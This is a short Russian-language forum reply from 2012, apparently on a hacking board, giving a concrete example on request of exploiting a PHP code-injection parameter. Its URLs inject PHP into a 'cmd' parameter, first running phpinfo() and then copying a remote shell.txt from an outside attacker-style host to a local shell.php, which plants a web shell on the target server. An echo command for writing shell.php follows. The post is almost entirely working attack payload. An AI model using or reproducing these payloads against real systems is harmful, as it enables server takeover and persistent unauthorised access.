
22.12.2012, 21:32
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 3
Провел на форуме: 7301
Репутация:
0
|
|
Сообщение от ldschooler
ldschooler said:
А можно на конкретном примере?
Код:
Code:
http://target/evil.php?cmd=
http://target/evil.php?cmd=phpinfo();
http://target/evil.php?cmd=$f=fopen($_GET[r],$_GET[rr]);$o=fopen($_GET[o],$_GET[oo]);while(!feof($f)){$row=fgets($f);fputs($o,$row);} &rr=r&oo=w+&r=http://evilsite.ru/shell.txt&o=shell.php
Либо echo '' > shell.php
|
|
|